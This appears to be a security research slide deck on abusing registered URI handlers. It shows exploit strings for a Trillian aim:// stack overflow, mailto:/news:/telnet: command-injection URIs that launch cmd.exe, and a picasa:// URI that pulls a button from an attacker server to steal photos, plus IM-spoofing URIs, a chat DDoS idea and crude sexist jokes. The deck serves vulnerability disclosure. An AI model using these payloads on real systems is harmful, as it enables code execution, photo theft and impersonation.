# URI Use and Abuse ----- # Contributing Authors #### • Nathan McFeters – Senior Security Analyst – Ernst & Young Advanced Security Center, Chicago • Billy Kim Rios – Senior Researcher – Microsoft, Seattle • Rob Carter – Security Analyst – Ernst & Young Advanced Security Center, Houston ----- # URIs – An Overview #### • Generic ##### – http://, ftp://, telnet://, etc. #### • What else is registered? ##### – aim://, firefoxurl://, picasa://, itms://, etc. ----- ## URIs – Interaction With Browsers #### • Developers create URI hooks in the registry for their applications • Once registered they can be accessed and interacted with through the browser • XSS can play too! ----- ## URI Discovery – Where and What? #### • RFC 4395 defines an IANA-maintained registry of URI Schemes • W3C maintains *retired* schemes • AHA! The registry! Enter DUH! ----- # DUH Tool – Sample Output ----- ## Attacking URIs – Attack Scope #### • URIs link to applications • Applications are vulnerable to code flaws and functionality abuse • URIs can be accessed by XSS exposures ----- ## Stack Overflow in Trillian’s aim.dll Through the aim:// URI #### • The aim:// URI is associated with the command ‘Rundll32.exe “C:\Program Files\Trillian\plugins\aim.dll”, aim_util_urlHandler url=”%1” ini="c:\program files\trillian\users \default\cache\pending_aim.ini”’. ----- ## Stack Overflow in Trillian’s aim.dll Through the aim:// URI #### • Attacker controls the value that is put into aim_util_urlHandler through the URI, such as aim://MyURL. • Value is copied without bounds checking leading to a stack overflow ----- ## Stack Overflow in Trillian’s aim.dll Through the aim:// URI ###### Example: • aim:///#1111111/11111111111111111111111111111111111 1111111111111111111111111122222222222222222222222 2222222222222222222222222222222222222233333333333 3333333333333333333333333333333333333333333333333 3444444444444444444444444444444444444444444444444 4444444444444555555555555555555555555555555555555 55555555555555555555555556666666AAAABBBB6666666 6666666666666666666666666666666666666666666666666 6666677777777777777777777777777777777777777777777 7777777777777777788888888888888888888888888888888 8888888888888888888888888888899999999999999999999 9999999999999999999999999999999999999999900000000 0000000000000000000000000000000000000000000000000 ----- ## Stack Overflow Caught By OllyDbg ----- ## Control of Pointer to Next SEH Record and SE Handler ----- ### Command Injection in Call to Trillian’s aim.dll Through XSS #### • The command associated with aim:// takes two arguments, “URL” (which we control) and “ini”, which is set by default to C:\Program Files\Trillian\users \default\cache \pending_aim.ini. ----- ### Command Injection in Call to Trillian’s aim.dll Through XSS #### • Attacker can inject a “ to close off the “uri” command line argument and can then inject a new “ini” parameter. • The “ini” parameter is used to specify a file location to write startup data to. • We can control some of that startup data through the aim:// URI. ----- ### Command Injection in Call to Trillian’s aim.dll Through XSS ----- #### Bug in Microsoft’s IFrame.dll Through res:// URI (MS07-035) ##### • The res:// URI is a predefined pluggable protocol in Microsoft that allows content like images, html, xsl, etc. to be pulled from DLLs or executables. Ex: res://ieframe.dll/info_48.png • You have seen this, you just might not know it, if you have a 404 page or common error pages in IE, you’ll see a blue ?, this is loaded using res:// ----- #### Bug in Microsoft’s IFrame.dll Through res:// URI (MS07-035) • Playing with the res:// URI, it was discovered the browser would crash if the following URI was accessed: res://ieframe.dll/#111111/1 • Further testing led to res://ieframe.dll/#111111AAAAAA… (long string of A’s)…AA/1, which caused ----- #### Bug in Microsoft’s IFrame.dll Through res:// URI (MS07-035) ----- #### Bug in Microsoft’s IFrame.dll Through res:// URI (MS07-035) ----- ### Cross Browser Scripting – IE pwns Firefox and Netscape Navigator ##### • Firefox and Netscape Navigator 9 register URIs to be “compliant with Windows Vista”. • These URIs (“firefoxurl” and “navigatorurl”) are vulnerable to command injection when called from IE. • Gecko based browsers accept the –chrome argument, and we can inject this to supply arbitrary JavaScript code that allows us to ----- ### Cross Browser Scripting – IE pwns Firefox and Netscape Navigator ----- ## Command Injection in Firefox and All Gecko Based Browsers, Microsoft Outlook, etc. #### • This is actually caused by a flaw in Microsoft’s shell32.dll file on non-Vista machines. • Was fixed for Firefox by Mozilla Sec. Team for Firefox in version 2.0.0.7. ----- ## Command Injection in Firefox and All Gecko Based Browsers, Microsoft Outlook, etc. ----- ## Command Injection in Firefox and All Gecko Based Browsers, Microsoft Outlook, etc. ###### • The following URIs will cause a command injection: – mailto:%00%00../../../../../../windows/system32/cmd".exe ../../. ./../../../../../windows/system32/calc.exe " - " blah.bat – nntp:%00%00../../../../../../windows/system32/cmd".exe ../../../ ../../../../../windows/system32/calc.exe " - " blah.bat – news:%00%00../../../../../../windows/system32/cmd".exe ../../.. /../../../../../windows/system32/calc.exe " - " blah.bat – snews:%00%00../../../../../../windows/system32/cmd".exe ../../ ../../../../../../windows/system32/calc.exe " - " blah.bat – telnet:%00%00../../../../../../windows/system32/cmd".exe ../../.. /../../../../../windows/system32/calc.exe " - " blah.bat ----- ### Trust-based Applet Attack against Google’s Picasa (T-bAG) #### • picasa://importbutton?url= http://shadyshady.com/evilbutton.xml • Yep, that’s right it imports a remote XML description of a button • If that button is loaded from OUR server and clicked we get to see all those naughty pictures of your girlfriend ----- ### The Plan – Ghetto Whiteboard Edition ----- ### The Plan – Ghetto Diagram Edition ###### The Hacker YouTube, MySpace Hacker Plants XSSVictim Get’s PwnedLoad Flash, Rebind, Steal Images Victim’s Web Browser Attack Server ----- ### Trust-based Applet Attack against Google’s Picasa (T-bAG) ###### The button.pbf file looks like so: • ----- ### Trust-based Applet Attack against Google’s Picasa (T-bAG) ###### • When the button is clicked, Picasa starts up its own instance of Internet Explorer to open up whatever is at http://natemcfeters.com/pwn.py • The real interesting thing is what Picasa SENDS: ----- # What’s Sent by Picasa?! ----- # Why Flash? #### • We chose Flash to exploit our client- side attack vector for three reasons: ##### – 1. It is vulnerable to DNS Rebinding attacks. – 2. If a valid crossdomain.xml file is present we can connect back to our attack server. – 3. As of Actionscript 3.0 we now have access to a Socket class that can read and write raw binary data. ----- ### Trust-based Applet Attack against Google’s Picasa (T-bAG) ----- # PDP’s PDF Sploit #### • One of the URI/Protocol handler attack vectors that gained a lot of publicity was the PDF based attack by PDP • This was based off of our same mailto: command injection, and in fact, the version in the wild also uses this ----- # Stupid IM Trick ##### • I want to talk to your girlfriend as if I’m you! ###### – ymsgr:sendim?yourGirlFriend&m=I+think+we+sho uld+break+up…+sorry+but+its+you+not+me – gtalk:chat?jid=Pwn1ch1wa@gmail.com – gtalk:call?jid=Pwn1ch1wa@gmail.com – gtalk:voicemail?jid=Pwn1ch1wa@gmail.com – aim:goim?screenname=yourGirlFriend&m=I+really +think+you’d+be+happier+with+Nate – skype, Gadu-Gadu, Jabber, etc. ----- # Yep, They’re Stupid, but… #### • Aside from stealing your girlfriend and causing a Denial of Service on you… • What if you could XSS a lot of people from one page and then force their browsers to loop through sending as many of these messages as possible? • DDoS on all chat providers anyone? ----- # What’s Next? *Nix Anyone? ###### • Why oh why is no one talking about *Nix yet. Why? No registry… or is there? AHA! DUH4Linux.sh! • #!/bin/bash gconftool-2 /desktop/gnome/url-handlers --all-dirs | cut -- delimiter=/ -f 5 | while read line; do { gconftool-2 /desktop/gnome/url-handlers/$line -a | grep - i 'command' | cut --delimiter== -f 2 | while read line2; do { echo "$line $line2" } done } done ----- # Output from DUH 4 Linux ###### • -bash-3.00$ ./DUH4Linux.sh • man gnome-help "%s" • cdda /usr/libexec/gnome-cdda-handler %s • aim gaim-remote uri "%s" • info gnome-help "%s" • server-settings nautilus "%s" • applications nautilus "%s" • https firefox %s • unknown mozilla "%s" • ghelp gnome-help "%s" • h323 gnomemeeting -c %s • about firefox %s • trash nautilus "%s" • http firefox %s • system-settings nautilus "%s" • callto gnomemeeting -c %s • mailto evolution %s ----- ## An Apple a Day Keeps the Hackers at Bay? Yeah, right. #### • DUH4Mac was developed for me by Carl Lindberg, the same guy who brought us RCDefaultApp for turning these off on a Mac • Has already helped us uncover on bug in Mac URI handlers ----- # Output From DUH4Mac ###### • URL Name App Bundle ID App (Current Path) • mailto Mail (/Applications/Mail.app) • pcast com.apple.itunes iTunes (/Applications/iTunes.app) • x-man-page Terminal (/Applications/Utilities/Terminal.app) • ftp org.mozilla.firefox Firefox (/Applications/Firefox.app) • im iChat (/Applications/iChat.app) • applescript Editor (/Applications/AppleScript/ScriptEditor.app) • webcalcom.apple.ical iCal (/Applications/iCal.app) • directoryconnection (/Applications/Utilities/Directory Utility.app) • rtsp QuickTime (/Applications/QuickTime Player.app) • Keynote Keynote (/Applications/iWork '06/Keynote.app) • ichat iChat (/Applications/iChat.app) • feed Safari (/Applications/Safari.app) • ssh Terminal (/Applications/Utilities/Terminal.app) • message Mail (/Applications/Mail.app) • afp Finder (/System/Library/CoreServices/Finder.app) • daap com.apple.itunes iTunes (/Applications/iTunes.app) • mmsu WMV (/Applications/Flip4Mac/WMV Player.app) • … ----- ## iPhoto Pwnage for Fun and Profit #### • A format string vulnerability exists in iPhoto which can be triggered by enticing a user to subscribe to a maliciously crafted photocast • A remote attacker may be able to cause arbitrary execution of code ----- ## iPhoto Pwnage for Fun and Profit ----- ## iPhoto Pwnage for Fun and Profit ----- ## iPhoto Pwnage for Fun and Profit ----- ## iPhoto Pwnage for Fun and Profit ----- ## iPhoto Pwnage for Fun and Profit ----- ## iPhoto Pwnage for Fun and Profit ----- ## iPhoto Pwnage for Fun and Profit ----- ## iPhoto Pwnage for Fun and Profit ----- ## And… Just in Time for Tax Season #### • TurboTax on the Mac brings you friendly URIs… WHY?! ##### – com.intuit.ctg.tpshelpscreen – com.intuit.ctg.tpsformaddress – com.intuit.ctg.tpsformfieldhelp – com.intuit.ctg.easystepjump ----- # Conclusions and Questions #### • We enjoy guns, beautiful FBI women, and loud music… any ladies out there than can help us with all three? • Any questions? -----